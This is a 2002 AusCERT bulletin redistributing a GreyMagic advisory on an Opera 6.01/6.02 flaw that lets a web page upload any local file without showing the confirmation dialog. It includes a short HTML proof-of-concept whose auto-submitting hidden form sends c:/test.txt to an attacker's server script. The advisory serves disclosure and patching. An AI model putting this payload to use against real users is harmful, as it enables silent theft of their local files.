Operating System:

[WIN]

Published:

04 June 2002

Protect yourself against future threats.

//Service

Phishing Take-Down

Drawing on our strong international CERT relationships we have a high success rate in delivering phishing take-downs.

Read more
Resources > Security Bulletins > ESB-2002.259 

-----BEGIN PGP SIGNED MESSAGE-----

===========================================================================
             AUSCERT External Security Bulletin Redistribution

           ESB-2002.259 -- GreyMagic Security Advisory GM#001-OP
                      Reading ANY local file in Opera
                                5 June 2002

===========================================================================

        AusCERT Security Bulletin Summary
        ---------------------------------

Product:                Opera 6.01
                        Opera 6.02
Vendor:                 Opera Software
Operating System:       Windows
Impact:                 Read-only Data Access
Access Required:        Remote

Comments: AusCERT does not endorse experimentation with "proof of concept"
          demonstrations - members undertaking this do so at their own risk.

          Opera Changelog:
          http://www.opera.com/windows/changelog/log603.html

- --------------------------BEGIN INCLUDED TEXT--------------------

GreyMagic Security Advisory GM#001-OP
=====================================

By GreyMagic Software, Israel.
27 May 2002.

Available in HTML format at http://security.greymagic.com/adv/gm001-op/.

Topic: Reading ANY local file in Opera.

Discovery date: 07 May 2002.

Affected applications:
======================

* Opera 6.01 on Windows platforms.
* Opera 6.02 on Windows platforms.


Introduction:
=============

>From Opera.com:

* "Opera today ranks number three among the most widely used Internet browsers
in the world."

* "Opera is small, super-fast, secure, and can run at an optimal level without
straining system resources. We like to say that we abide by The 5 S's in all
code development: Speed, Size, Security, Standards Compliance and
State-of-the-Art."

Opera, like all browsers today, supports the <input type="file"> element, which
is a standard method for users to upload files to HTTP servers. Since the file
element is a very security-sensitive element, most web browsers do not allow
its "value" attribute to be set (read only). If it was possible to assign an
arbitrary string to the "value" attribute, an attacking server could fetch any
local file by simply submitting a form (through scripting or social
engineering, if scripting has been disabled).

Opera's approach to the file element is a little different. The "value"
attribute can be set, but before the form it resides in is submitted, a dialog
comes up with the following warning:

The files listed below have been selected, without your intervention, to be
sent to another computer. Do you want to send these files?"


Discussion:
===========

It is possible to bypass the file element's confirmation dialog, which means an
attacker can download any file from an unsuspecting Opera user.

By appending a simple "&#10;" (HTML entity, which represents the ASCII code for
a new-line character) to the end of the file element's "value" attribute,
Opera's security algorithm is fooled to think that no files were assigned.
Therefore, the warning dialog doesn't come up; Opera simply submits the form
with the desired file chosen by an attacker.

Surprisingly, versions of Opera prior to 6.01 are not vulnerable to this
attack. So a change that occurred between version 6.0 and 6.01 is the culprit.
This also means that all of the non-windows versions are safe (Opera did not
release 6.01 for other platforms yet).


Exploit:
========

This exploit will automatically transfer the file "c:/test.txt" to an attacking
host, which can handle it using a server-side environment such as ASP, PHP or
other solutions. It does not require any user interaction:

<body onload="document.secForm.submit()">
<form method="post" enctype="multipart/form-data" action="recFile.php"
name="secForm">
<input type="file" name="expFile" value="c:	est.txt&#10;"
style="visibility:hidden">
</form>
</body>


Solution:
=========

Opera was informed on 15 May 2002 and confirmed our findings. A day later, in
the evening of 16 May 2002, Opera informed us that the vulnerability was fixed
and committed to Opera's own version control system.

On 27 May 2002, Opera released version 6.03, which addressed this issue.

Opera has been extremely responsive and quick to understand and patch this
vulnerability. They have shown that they truly do take security seriously.


Tested on:
==========

Opera 6.01, NT4.
Opera 6.01, Win2000.
Opera 6.01, WinXP.
Opera 6.02, NT4.
Opera 6.02, Win2000.
Opera 6.02, WinXP.


Demonstration:
==============

A fully dynamic proof-of-concept demonstration of this issue is available at
http://security.greymagic.com/adv/gm001-op/.


Feedback:
=========

Please mail any questions or comments to security@greymagic.com.

- - Copyright © 2002 GreyMagic Software.

- --------------------------END INCLUDED TEXT--------------------

You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.

This security bulletin is provided as a service to AusCERT's members.  As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content.  The decision to use any or all of this information is
the responsibility of each user or organisation, and should be done so in
accordance with site policies and procedures.

NOTE: This is only the original release of the security bulletin.  It may
not be updated when updates to the original are made.  If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the original authors to ensure that the information is still current.

Contact information for the authors of the original document is included
in the Security Bulletin above.  If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:

	http://www.auscert.org.au/Information/advisories.html

If you believe that your system has been compromised, contact AusCERT or
your representative in FIRST (Forum of Incident Response and Security
Teams).

Internet Email: auscert@auscert.org.au
Facsimile:	(07) 3365 7031
Telephone:	(07) 3365 4417 (International: +61 7 3365 4417)
		AusCERT personnel answer during Queensland business hours
		which are GMT+10:00 (AEST).
		On call after hours for member emergencies.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv
Comment: ftp://ftp.auscert.org.au/pub/auscert/AUSCERT_PGP.key

iQCVAwUBPP3rFyh9+71yA2DNAQGITwP8DSwuPsYU9/s0NeIY+aWBzcqM60OrfyNo
pJr0kmvaahkIWkwVItHwS/pOUgPexGbWBnDncRhHa7ENsqsrZe/KJLLe9Yk+v6Qr
A+mKNaGyJ/75nHiYQdcYVYYTSAUh4V3dU1D9HQ3Si/z+QnCEcZCOg2sYjVCQ+s3/
yR568MhEnUU=
=gej3
-----END PGP SIGNATURE-----